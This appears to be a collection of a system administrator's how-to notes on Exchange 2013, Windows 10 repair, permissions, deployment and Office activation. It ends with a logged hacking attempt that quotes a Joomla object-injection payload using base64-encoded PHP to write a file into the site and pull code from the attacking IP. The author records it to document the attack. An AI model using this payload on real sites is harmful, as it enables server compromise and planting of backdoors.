sequential numbers then you can try: wget -nd -r -A jpg -e robots=off http://wherever.tld/gallery/{0..1000}.jpg Create a ZIP File in Linux Create a ZIP file in Linux. This will create a ZIP file called foo.zip that contains all of the documents in the current directory. zip foo.zip ./* Exchange 2013 Move Mailbox From One Database to Another Database Here's the command to move a mailbox from one database to another database: New-MoveRequest foo.user -TargetDatabase "Mailbox XYZ" Here's how to do a batch based on last name letter: Get-mailbox -Database "Mailbox-Foo1" -ResultSize Unlimited |get-recipient -RecipientType UserMailbox -Filter {lastname -like 'h*'} |get-mailbox |New-MoveRequest -TargetDatabase "Mailbox-Foo2" -BatchName "Foo-batch" Here are the diagnostic short list: get-moverequest get-moverequeststatistics remove-moverequest foo.user (get-moverequest).count SPEED TWEAKS ON HOW TO MOVE MAILBOXES FASTER I have found that moves are slow unless they are set as EMERGENCY. Here's how: set-MoveRequest foo.user -priority emergency Also, some have found that turning off the MRS (throttling) improves performance. I haven't tried it. Here's how: reg query "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS :: TURN OFF MRS echo y | reg add "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /d 0 :: STOP EXCHANGE REPLICATION SERVICE sc stop MSExchangeRepl :: TURN ON MRS echo y | reg add "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /d 1 :: START EXCHANGE REPLICATION SERVICE sc start MSExchangeRepl SEE WHAT'S HAPPENING Here's how to see how the full list: Get-moverequest |get-moverequeststatistics |sort-object -Property PercentComplete -descending Here's how to see how many have finished: (Get-MoveRequest -movestatus completed).count Here's how to see how many are in progress: (Get-MoveRequest -movestatus inprogress).count Here's how to see how the normal-moves are going: Get-moverequest -movestatus inprogress |get-moverequeststatistics |sort-object -Property PercentComplete -descending Here's how to see how the emergency-moves are going: Get-moverequest -movestatus inprogress -flags highpriority |get-moverequeststatistics |sort-object -Property PercentComplete -descending WHAT TO DO WITH "FAILED" MOVES If move requests fail, you can see why. Here's how: get-moverequeststatistics -includereport foo.user |fl Usually a single bad item. You can set the move to raise the badlimit just a little and restart the move with the following: get-moverequest foo.user |set-moverequest –baditemlimit 10 -priority emergency resume-moverequest foo.user EXCHANGE 2013 Mailflow Stop After Update is Cancelled Cancel EXCHANGE update (CU13) because it requires a HOTFIX (or two) before it continues. Afterwards, OUTLOOKs are disconnected; OUTLOOK-WEB-ACCESS works; sending & receiving email doesn't work. Hmmmm.... what to do. Checking the WINDOWS logs and I see: "Failed to discover Ews Url for mailbox" Then I check for the EXCHANGE COMPONENT STATUS: • Get-ServerComponentState –Identity ServerNameHere This will tell you the state of the server components in an ACTIVE/INACTIVE way. If something is INACTIVE, you can turn it to ACTIVE by: • Get-ServerComponentState –Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Functional • sc stop MSExchangeTransport • sc stop MSExchangeFrontEndTransport • timeout 80 • sc start MSExchangeTransport • sc start MSExchangeFrontEndTransport It should turn back to ACTIVE. However, if there was a second REQUESTER making the change to INACTIVE, this REQUESTER must also set to ACTIVE for the whole status to be ACTIVE: • Get-ServerComponentState –Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Maintenance • sc stop MSExchangeTransport • sc stop MSExchangeFrontEndTransport • timeout 80 • sc start MSExchangeTransport • sc start MSExchangeFrontEndTransport Another way to fix this is to install the HOTFIXES that are needed and then proceed with the EXCHANGE update. Wait about an hour or so and viola! Working server automatically. Apparently, the EXCHANGE update automatically turns off some of the components. If the update is canceled, these components are left in the INACTIVE state. Going through the update process turns the components to the ACTIVE state automatically. NOTES: -https://blogs.technet.microsoft.com/exchange/2013/09/26/server-component-states-in-exchange-2013/ -google: "Failed to discover Ews Url for mailbox" -google: "ServerWideOffline" -to test mail flow use: Test-Mailflow -TargetEmailAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it How to Enable DOTNET 3.5 on Windows 10 BACKGROUND DOTNET is a computer language. If it is installed on you, you can speak it and understand it. DOTNET is to MICROSOFT what JAVA is to SUN/ORACLE. There are certain versions of DOTNET that automatically come with certain versions of WINDOWS. They are as follows: DOTNET VERSION DATE WINDOWS VERSION 1.0.0 02/13/02 XP 1.1.0 04/24/03 N/A 2.0.0 11/07/05 N/A 3.0.0 11/06/06 Vista 3.5.0 11/19/07 7 4.0.0 04/12/10 N/A 4.5.0 (378389) 08/15/12 8 4.5.1 (378675/378758) 10/17/13 8.1 4.5.2 (379893) 05/05/14 N/A 4.6.0 (393295) 07/20/15 10 4.6.1 (394254) 11/30/15 10 v1511 (November Update) 4.6.2 (394802) 08/02/16 10 v1607 (Anniversary Update) 4.7.0 (460798) 04/11/17 10 v1703 (Creators Update) 4.7.1 (461308) 10/17/17 10 v1709 (Fall Creators Update) DOTNET can be installed in parallel with other versions. For example, v3.5 can be installed with v4.0. Certain versions of DOTNET are required for certain software to run. If something is built to run off of v3.5, this doesn't mean it will work with v4.6.2. Starting with WINDOWS 10, DOTNET v4.6.0 is included. DOTNET v3.5 (including v2 & v1) is included in WINDOWS 10 as a "feature" but it is not installed/enabled. TO SEE IF DOTNET 3.5 (v2 & v1) IS INSTALLED ON WINDOWS 10 • -click START > RUN • -type: cmd • -type: DISM /Online /get-features /Format:Table This will list out all the features of WINDOWS 10 and their status. You are looking for NETFX3. This is DOTNET v3.2 (v2 & v1). ENABLE DOTNET v3.5 (v2 &v1) If it is not enabled, you will need to enable it. • -click START > RUN • -type: cmd • -type: DISM /Online /Enable-Feature /FeatureName:NetFx3 /All Or for an OFFLINE installation where you have the source CD/DVD/USB/WIM: • DISM /Online /Enable-Feature /FeatureName:NetFx3 /All /LimitAccess /Source:c:\path\to\Windows10x64\sources\sxs FIND DOTNET VERISION To find the DOTNET version: • -type: Get-ChildItem "hklm:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\" or • -type: reg query "hklm\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v Release This will give the value in HEX. You have to convert the HEX number to DEC. This will give a RELEASE value that corrosponds to a VERSION number. See the chart above. WINDOWS PERMISSIONS WITH ICACLS WINDOWS permissions with icacls. When permissions in WINDOWS is FUBAR'd, start from scratch by resetting the permissions as they would be if nothing has changed. RESET PERMS FOR DIR RECURSIVELY icacls folder-name-here /t /reset Now, from this point if you would like to add a USERNAME or GROUPNAME: ADD FULL PERMS FOR DIR RECURSIVELY (doesn't change existing) icacls folder-name-here /grant username-or-groupname:f /t If you want to set permissions explicitly as you tell it to: REMOVE INHERITANCE | GRANT USERNAME | (CI) ENSURES NEW ITEMS WILL HAVE THESE PERMS (changes everything from scratch) icacls foo-folder /inheritance:r /grant username:(ci)f /t EXAMPLE (This is probably what you want. The SYSTEM, OWNER, ADMINISTRATORS all have FULL CONTROL. The USERNAME has READ-ONLY-CONTROL). icacls foo-dir /inheritance:r /grant "creator owner":(CI)(CI)F system:(CI)(CI)F administrators:(CI)(CI)F other-username-for-full-control:(CI)(CI)F other-groupname-for read-control:(CI)(CI)RX /T BONUS: If you need to take ownership beforehand, you can do so by the following: takeown /f top-folder-name /r /d y or: takeown /f "c:\foo folder" /r /d y How To Find .Net Version Installed | How To Find the Powershell Version Installed Find .Net Version installed on your computer or to find the Powershell version installed on your computer: • -open POWERSHELL • -type:$PSVersionTable The CLRVersion is the .NET version in "version name." If you want to know what it is in "product name" type it into google. The PSVersion is the Powershell version installed. How to Checksum Files in Windows 10 How to Checksum Files in Windows 10. There are a few ways to CheckSum files in Windows 10 listed in the great wide open of the internet. They are as follows: fciv (outdated from 2004) fciv -md5 d:\programs\setup.exe certutil (built into Windows) CertUtil -hashfile C:\TEMP\MyDataFile.img MD5 get-filehash (built into PowerShell v4 and higher) get-filehash -algorithm md5 <file_to_check> other tools There are other tools out there but I prefer to stick with what's built into the OS and released/blessed from the OS author. Access RAPIDSSL Certificates To access your RAPIDSSL certificates or your GEOTRUST certificates, you can login to their END USER PORTAL here: This is kinda hidden since typically RAPIDSSL only sells to resellers and pushes all support through them, so I'm making a note of it. SQL Server 2014 High CPU After Installing SP2 SQL Server 2014 High CPU After Installing SP2. There are 3 steps I used to fix this: STEP 1: find the username of the SQL • -open "SQL Server 2014 Configuration Manager." • -right-click on the instance of SQL that you are running. • -click PROPERTIES (a box opens). • -click LOG-ON tab (at the top). • -take note of the USERNAME that is running. • -click OK • -exit out of "SQL Server 2014 Configuration Manager." STEP 2: add the username to the LOCK PAGES IN MEMORY section • -click START > RUN • -type: gpedit.msc • -click COMPUTER-CONFIGURATION > WINDOWS-SETTINGS > SECURITY-SETTINGS > LOCAL-POLICIES > USER-RIGHTS-ASSIGNMENT • -find LOCK-PAGES-IN-MEMORY • -type in the USERNAME from above. STEP 3: adjust the MAX MEMORY • -open the 2014 MANAGEMENT STUDIO • -login to the SQL DATABASE you are running. • -right-click the SQL DATABASE name (at the top, on the left-hand side) • -click PROPERTIES • -click MEMORY (on the left hand side). • -you will see the MINIMUM SERVER MEMORY and the MAXIMUM SERVER MEMORY areas. • -leave the MINIMUM SERVER MEMORY at 0 (zero). • -find the MAXIMUM SERVER MEMORY box. • -type in the number for your server. This number is based on the amount of RAM in your system. • -the chart is here: https://www.brentozar.com/blitz/max-memory/ • -click OK. That's it!!! You did it!!! Windows 10 Product Key slmgr /ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx Of course, replace your product key here. This didn't work for me for some reason. I had to go traditional gui route and that worked. Same product key. WOL Control Waking remote computers with WOL. As usual, the options are dizzying. Here's a cheat sheet. See what's capable: powercfg -devicequery wake_from_any But this list is too long. Since not all devices can be config'd, some devices are going to wake whether the user wants them to or not. So to see what's capable of being user config'd (what can be changed): powercfg -devicequery wake_programmable See what's enabled: powercfg -devicequery wake_armed And finally, to enable a device to be a waking point: POWERCFG -deviceenablewake "exact device name here" A quick batch script would be: POWERCFG -devicequery wake_from_any | FINDSTR /i "net" > c:\foo\adapters.txt FOR /F "tokens=*" %%i IN (c:\foo\adapters.txt) DO POWERCFG -deviceenablewake "%%i" Manage Printers via Command Line Manage printers via command line: • Get the default printer details from command line: • Get the list of printers added to the system from Windows command line: • Set default printer from windows command line: Install Windows 10 In-Place Upgrade on All Computers in a Domain With PDQ Deploy Install Windows 10 In-place upgrade on a domain is possible in a couple of ways. The official way is to use the MICROSOFT DEPOLYMENT TOOLKIT found here: https://technet.microsoft.com/en-us/windows/dn475741.aspx The other way is through simple network share. Wait... what? Yes, network share. • -you will see 4 options WINDOWS 10 (all languages) WINDOWS 10 K (Korean law) WINDOWS 10 N (European law) WINDOWS 10 SINGLE LANGUAGE (1 language only) • -simply download the one you need. The one that matches what you have now which is probably WINDOWS 10 ALL LANGUAGES. • -again, since you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having is that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine. • NOTE: do NOT use the MEDIA-CREATION-TOOL for this exercise. STEP 2: mount WINDOWS 10 ISO This means show the files that are in the ISO. Windows 7 cannot do this without some help such as WINRAR, 7ZIP or VIRTUAL-CLONEDRIVE. WINDOWS SERVER 2012, WINDOWS 8.1 and newer can do this without additional software. This can happen either through the GUI or through POWERSHELL command MOUNT-DISKIMAGE. There is no correct way on how you mount the ISO, just do it. STEP 3: create the network share Create the share: • md C:\installs\os\win10x64\unpack STEP 4: copy the ISO contents onto a created network share. I use ROBOCOPY to do this. It is built into WINDOWS 7 and newer. Something like: • robocopy /e f:\ C:\installs\os\win10x64\unpack STEP 5: Build your install package Pretty easy when you know what to do it right. • -select the setup.exe on the network share. Something like: \\myserver\installs\os\win10x64\unpack\setup.exe • -type in the parameters: /auto upgrade /Compat IgnoreWarning /installfrom c:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\sources\install.wim /dynamicupdate disable /showoobe none /quiet NOTE: if you would like, you can save the log files as well. Add the following to the end of the parameters above: /copylogs \\myserver\installs\os\win10x64\logs • -checkmark "Include Entire Directory" • click PACKAGE PROPERTIES • make sure the COPY MODE is changed to PULL (not PUSH). • checkmark "use custom timeout" and change the number to 240. • save the package. STEP 6: deploy on test victim. That should do it!!! If the test pc works, deploy to the rest of the pc's how you see fit. ============================================================== If for some reason the above PDQ package fails, you can create a .bat file and fill it with following (adjust as necessary): :: MAKE DIRECTORY. md c:\installs\Windows10x64 :: COPY FILES. robocopy /MIR \\myserver\installs\os\win10x64\unpack\ c:\installs\Windows10x64 :: CHANGE DIRECTORY. cd c:\installs\Windows10x64 :: START THE IN-PLACE UPGRADE (OR CLEAN INSTALL). start /wait setup.exe /auto upgrade /Compat IgnoreWarning /installfrom c:\installs\Windows10x64\sources\install.wim /dynamicupdate disable /showoobe none /quiet • Save this .bat in \\myserver\installs\os\win10x64\unpack\ • Then create a PDQ package with this bat. • Deploy as you see fit. Office 2010 "You don't have permission to open this file." You also might get, "filename.xls could not be found." -disable Panda's DATA SHIELD. Panda's Cloud free antivirus has a new component called Data Shied. Disable the DATA SHIELD and it will fix the issue. Automatically Install Office 2016 to Domain Network • -mount ISO. • -copy contents to network share. • -config (product key, org name, etc). • -click FILE SAVE. • -save the MSP file at the network share. This will automatically deploy OFFICE 2016 to domain PC's of your choosing. And it's completely silent. This process is how network administration should be done! Not "proof of concept" stuff along with long winded instruction sets. HDMI Cable Speeds 2160/60p, 4:2:0, 8-bit, 8.91Gbps 2160/60p, 4:2:0, 10-bit, 11.14Gbps 2160/60p, 4:2:0, 12-bit, 13.37Gbps 2160/60p, 4:2:0, 16-bit, 17.82Gbps 2160/60p, 4:2:2, 8-, 10- or 12-bit, 17.82Gbps 2160/60p, 4:4:4, 8-bit, 17.82Gbps 4320/60p, 4:4:4, 12-bit, ~72Gbps HDMI CERTIFICATE TYPES Standard (or "category 1"), no Ethernet; High Speed (or "category 2"), no Ethernet; Standard, with Ethernet; High Speed, with Ethernet; Full Disclosure: I have an AudioQuest cable. Picked it up at a conference as a freebie ;-) ErrorCode: 1603(0x643) | Office 2010 Won't Install on Windows 10 | CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057 WINDOWS 10 is having trouble installing software. This is a complex issue but basically some software won't install (or updates won't install) because of an ERROR 1603. More specifically: ErrorCode: 1603(0x643). Turning on VERBOSE logging (check another article but it puts the logs in %user%\appdata\local\temp) for the install, it shows that the actual error is: CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057. Hmmm... What to do? • -click START > RUN > REGEDIT • -navigate to: hkey_local_machine/software/microsoft/windows nt/currentversion/profilelist Nested underneath, you will see SID's. Somthing like: • s-1-5-18 • s-1-5-19 • s-1-5-20 • s-1-5-21-...1000 • s-1-5-21-...1003 • s-1-5-82 To see what SID's corrospond to actual accounts. • -type: wmic useraccount get name,sid You'll see something like: • 1000 owner • 1003 tempfix Notice that s-1-5-18, s-1-5-19, s-1-5-20 do not show. So what's up? Well, this is because these are system-accounts that are not be used/seen. This is what we are concerned about. They are as follows: • s-1-5-18 is SYSTEM • s-1-5-19 is LOCAL SERVICE • s-1-5-20 is NETWORK SERVICE Next, go back to regedit to: hkey_users A DEFAULT NORMAL INSTALL has something like: • S-1-5-18 • s-1-5-19 • s-1-5-20 • s-1-5-21-...1215 • s-1-5-21-...1216 • s-1-5-21-...1217 What we are seeing is that some of the upgrades to WINDOWS 10 are BROKEN and has the following: • s-1-5-18 • s-1-5-19 • s-1-5-21-...1000 • s-1-5-21-...1003 So, it is missing s-1-5-20. Here's how to fix: • -start > all-programs> accessories • -right click COMMAND-PROMPT > run-as-administrator • -type ren C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT *.OLD • -xcopy /h "C:\Users\Default\NTUSER.DAT" "C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT" • -in explorer travel to C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT • -right-click > properties > security > edit > add • -type: NETWORK SERVICE • -give NETWORK SERVICE full-control • -reboot Now, upon reboot, open REGEDIT again and go to HKEY_USERS. You should now see that s-1-5-20 is added back in. Let's add the correct permissions: • -right-click on S-1-5-20 • -type: network service • -click OK • -checkmark FULL CONTROL • -click OK I do not have a good explanation of why this happens. It could be a corrupt file. It could be a failed upgrade. It could be some type of antivirus. I do not know. What I know is that this took a few days to figure out and the software will now install successfully!!!! Let's say that you have an OFFICE 2010 install that doesn't work. You cannot uninstall it either. Nor do you have a CD/USB/SOURCE to install because it was on your computer when you bought it and you just used a PRODUCT KEY. What do you do? NOTE: !!!Make sure you have your PRODUCT KEY!!! You can get this with BELARC-ADVISOR (among many others). 1 - UNINSTALL OFFICE You can uninstall office by using the automatic uninstall tool here: 2013 | 2016 http://support.microsoft.com/kb/2739501 3 - EXTRACT OFFICE • -run COMMAND PROMPT (as administrator) • -office_hs_2010_english_x32.exe /extract:c:\office2010 4 - INSTALL OFFICE • -right-click on setup.exe [Solved] Your PC Ran Into A Problem And Needs To Restart Windows 10 Loop "Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop! or "Your PC did not start correctly" Collectively, let's all say "Arrrrrrrrrrrrrrrrgh!!!" This is the stuff that I really dread for the average person. How in the world is a normal person supposed to be able to get through an issue like this? There are 10 possible reasons for this loop and possibly more that need repairing: • 1-startup repair • 2-checkdisk • 3-system restore • 4-safe boot / low res • 5-sfc • 6-windowsapps folder • 7-registry repair • 8-boot repair • 9-dism ISSUE 1 - There is a startup problem (startup repair). • -click TROUBLESHOOT. • -click STARTUP REPAIR. • -let it go through its process and restart. ISSUE 2 - There is a filesystem problem (checkdisk). • -click TROUBLESHOOT. • -click COMMAND PROMPT • -type: chkdsk d: /f /r • (note depending on what your OS drive letter is, this could be: chkdsk c: /f /r) • -let it go through its process and restart. ISSUE 3 - System Restore • -click TROUBLESHOOT. • -click SYSTEM RESTORE. • this will go through a process of showing previous time in the past. You can choose one of these points. Your system-files will go back to that time, removing any updates, patches or changes. Your document-files will remain as they are now. • -let it go through its process and restart. ISSUE 4 - safe-mode or low-resolution-video • -click TROUBLESHOOT. • -click STARTUP-SETTINGS • -the computer will reboot and give the options to press F1 through F9 • -press F3 to try low-resolution video as sometimes Windows 10 suddenly doesn't like the video drivers. • -or press F5 to try to get to safe-mode-with-networking. ISSUE 5 - sfc • -click TROUBLESHOOT. • -click COMMAND PROMPT • -type: sfc /scannow • -let it go through its process and restart. ISSUE 6 - windowsapps folder For some reason the "windowsapps" folder gets messed up during an update or during system-restore (message about "appxstaging"): • -click TROUBLESHOOT. • -click COMMAND PROMPT • -type: takeown /f "C:\Program Files\WindowsApps" /r /d Y • -type: icacls "C:\Program Files\WindowsApps" /grant administrator:F /t • -type: rd /s "C:\Program Files\WindowsApps" • -reboot and see if that works. ISSUE 7 - There is a registry error. • -click TROUBLESHOOT. • -click COMMAND PROMPT • -type: d: • -hit enter • -type: cd windows • -hit enter • -type: cd system32 • -hit enter • -type: cd config • -hit enter • -type: ren default default1 • -hit enter • -type: ren sam sam1 • -hit enter • -type: ren software software1 • -hit enter • -type: ren security security1 • -hit enter • -type: ren system system1 • -hit enter • -type: cd regback • -hit enter • -type: copy * ..\ • (that is: copy-space-asterisk-space-dot-dot-backslash) • -hit enter • -type: exit • -let it reboot and see if that works. ISSUE 8 - There is a boot problem. • -click TROUBLESHOOT. • -click COMMAND PROMPT • -type:bootrec.exe /fixmbr • -type: bootrec.exe /fixboot • -type: bootrec.exe /RebuildBcd • -type: exit • -let it reboot and see if that works. ISSUE 9 - dism This is the only issue that I have not tried personally as I've never had to get this far. The idea is that there is something wrong with Windows and that it can be repaired: • -click TROUBLESHOOT. • -click COMMAND PROMPT • -type: dism /online /cleanup-image /scanhealth • -type: dism /online /cleanup-image /restorehealth • -let it go through its process and restart. ISSUE 10 - reload and transfer If I've gone through the 9 issues above without success, I throw in the towel and reload Windows 10 on a new hard drive (ssd) and transfer the data. Not ideal but usually by this point, reloading and transferring data is going to be faster than further troubleshooting. Those are the 10 issues that I go through when I get, "Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop. 1-3-2 Bios Beeps Dell Precision T3500 Dell Precision T3500 boots fine. Upon, reboot the system bios beeps: 1-3-2. In other words, beep (pause) beep-beep-beep (pause) beep-beep. Nothing. No bios. Just black screen. The only way to get it to reboot properly without the bios beeps is to yank the power from the computer. Wait till the electricity discharges from the motherboard by holding in the power button. Plug the system back into the power. Press the power button. But here's how to fix: • -reset to defaults. • -turn off the FAST BOOT. • -disable the DISKETTE DRIVE. • -uncheck the ONBOARD OR USB FLOPPY DRIVE. • -uncheck the ONBOARD OR USB CD DRIVE. While we are at it, change the silly default options: • -disable LOW-POWER-MODE. • -enable HYPER-THREADING (if you have it). • -enable MULTICORE. • -enable TURBOBOOST. • -disable SPEEDSTEP. • -enable SMART TEST. There could be other reasons. For me, this was what worked. The key seemed to be something in the FASTBOOT and the DISKETTE DRIVE. NOTES: • -this was a 6 month process :-( • -replacing the 525W power supply with a 850W power supply didn't work. WINDOWS 10 Falls Asleep After 2 Minutes MANUAL EDIT: 01 -click START > RUN > CMD (or POWERSHELL) (as administrator) 02 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\7bc4a2f9-d8fc-4469-b07b-33eb785aaca0" /v Attributes /d 2 03 -enter 04 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\2a737441-1930-4402-8d77-b2bebba308a3\d4e98f31-5ffe-4ce1-be31-1b38b384c009" /v Attributes /d 2 05 -enter 06 -click START > CONTROL-PANEL > POWER-OPTIONS > CHANGE-THE-PLAN-SETTINGS > click on the "Change advanced power settings". 07 -click on the "Change settings that are currently unavailable" 08 -click Sleep > System unattended sleep timeout > type 0 09 -click USB-SETTINGS > USB-3-LINK-POWER-MANAGEMENT > set to OFF 10 -click OK 11 That's it!!! You did it!!! OFFICE 2013 ACTIVATION I'm not an expert on ACTIVATION as LICENSING is a pain. Luckily, I'm in a corporate situation where budgets are secondary to getting it working. KMS & MAK are not covered here. Here's how: • -click START > RUN • -type: cmd • -type: cd C:\Program Files\Microsoft Office\Office15 From here, there are 3 basic commands to help and resolve: STATUS, CHANGE, ACTIVATE. GET STATUS • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus CHANGE KEY • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX ACTIVATE KEY • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act The result will look something like this: RESULT Microsoft (R) Windows Script Host Version 5.812 ---Processing-------------------------- --------------------------------------- SKU ID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX LICENSE NAME: Office 15, OfficeStandardVL_MAK edition LICENSE DESCRIPTION: Office 15, RETAIL(MAK) channel Last 5 characters of installed product key: XXXXX --------------------------------------- --------------------------------------- ---Exiting----------------------------- Sometimes, there is a double install where 2 different versions are installed at the same time. A KMS version and a MAK version. You can find out by SEE ALL KEYS THAT ARE TRYING TO ACTIVATE • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus UNINSTALL KEY THAT ISN'T CORRECT • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /unpkey:last-5-digits THEN IMMEDIATELY INSTALL AN MAK KEY • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX THEN ACTIVATE • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act Windows 10 ISO To be clear, you can do a CLEAN INSTALL of WINDOWS 10 if you have WINDOWS 7 or WINDOWS 8 or WINDOWS 8.1 until the end of JULY 2016. To do so, you need a WINDOWS 10 USB. This is easily obtained by using the WINDOWS 10 MEDIA CREATION TOOL (MCT) here: Now you have a bootable USB disk. But what if you want to create a multiple boot USB disk where WINDOWS 10 is just one of the options? You would somehow have to create a WINDOWS 10 ISO. I enjoy the E2B project. Despite being wordy and looking complicated, it's actually fairly simple. Here's the shortcut. • -click MAKE_E2B_USB_DRIVE (run as admin) (CAUTION!!! This will delete everything on the USB drive.) • -install your ISO/IMG/IMGPTN in the appropriate place. Now to the part where we need a WINDOWS ISO. To be fair, you can get a WINDOWS 10 ISO in 2 ways. FIRST WAY TO GET WINDOWS 10 ISO • -open CHROME • -click SETTINGS (at the upper right) > MORE-TOOLS > DEVELOPER-TOOLS • -a window open on the right hand side. • -click the TOGGLE-DEVICE-TOOLBAR icon (at the top of the right hand side). • (It is the second one from the left.) • -you will see 4 options WINDOWS 10 (all languages) WINDOWS 10 K (Korean law) WINDOWS 10 N (European law) WINDOWS 10 SINGLE LANGUAGE (1 language only) • -simply download the one you want (probably WINDOWS 10 ALL LANGUAGES) For me, doing this somehow downloaded the iso as a WINDOWS 10 HOME version. It doesn't matter, it will still install WINDOWS 10 PRO. But I would like the INSTALL.EDB to say WINDOWS 10 PRO. I do not know yet if it matters. NOTE: If you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having is that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine. SECOND WAY TO GET WINDOWS 10 ISO So you have a bootable USB to install WINDOWS 10. You want to turn that into an ISO. How do you do it? You don't turn it into an ISO. You turn it into a IMG (more specifically an imgPTN file). I won't go into details but you can't turn an entire bootable USB into an ISO easily. There's too many variables. But you can turn a bootable USB partition into a bootable partition image, hence imgPTN. Here's how to turn it into an BOOTABLE IMG. • http://files.easy2boot.com/200001685-7c24a7e1e7/MPI_Tool_Pack_Plus_CloverLite_065.zip • -unzip it. • -open the ImDisk\imdiskinst.exe file and run it to install the driver. • -plug in your BOOTABLE USB drive. • -the computer will assign a drive letter (for example DRIVE G). • -drag the USB DRIVE LETTER onto the MAKEPARTIMAGE shortcut. • -it will create an image of the USB drive. • -wait. • -put the IMG in the appropriate folder (probably G:\_ISO\WINDOWS\WIN10\). • -click MAKE_THIS_DRIVE_CONTIGUOUS That's it!!!! You've done it. Creating Resource Rooms in Exchange 2013 Creating resource rooms in EXCHANGE 2013 can be complicated as the GUI doesn't work in a straight-forward manner. Here's how I did it: • New-Mailbox -Database "Mailbox-FOO" -Name conference.downstairs -DisplayName "Conference Downstairs" -Room • Set-MailboxFolderPermission conference.downstairs:\Calendar -User Default -AccessRights Reviewer • Set-CalendarProcessing conference.downstairs -AutomateProcessing AutoAccept This will allow users to set an appointment with the ROOM as the LOCATION but will only allow the ORGANIZER to adjust the appointment (rather than letting anyone change the appointment). Hacking Attempt 16-06 Here's another hacking attempt on another hosted web site. This attempt is from: 74.208.47.52 which was resolving to catchmeapp.com NOTE: Often the hacking web site is not the perpetrator and is hacked itself. This makes it hard to discover the real hacker. ========================== GET / HTTP/1.1" 301 236 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimp lepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_u rl\";s:3810:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7 DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRz l3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFj bXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSn VJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5 OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6YzBMakl3T0M0ME55NDFNaTluWlhRdlkzTnpMblI0ZENjcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1 kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFwcFppaG1hV3hsWDJWNGFYTjBjeWdrWTJobFkyc3BLWHNOQ2lBZ0lDQmxZMmh2SUNS amFHVmpheTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeUk3RFFwbFkyaHZJQ0prYjI1bElDNWNiaUFpSURzTkNpUmphR1ZqYXpJZ1BTQWtYMU5GVWxaRlVsc25SRTlEVl 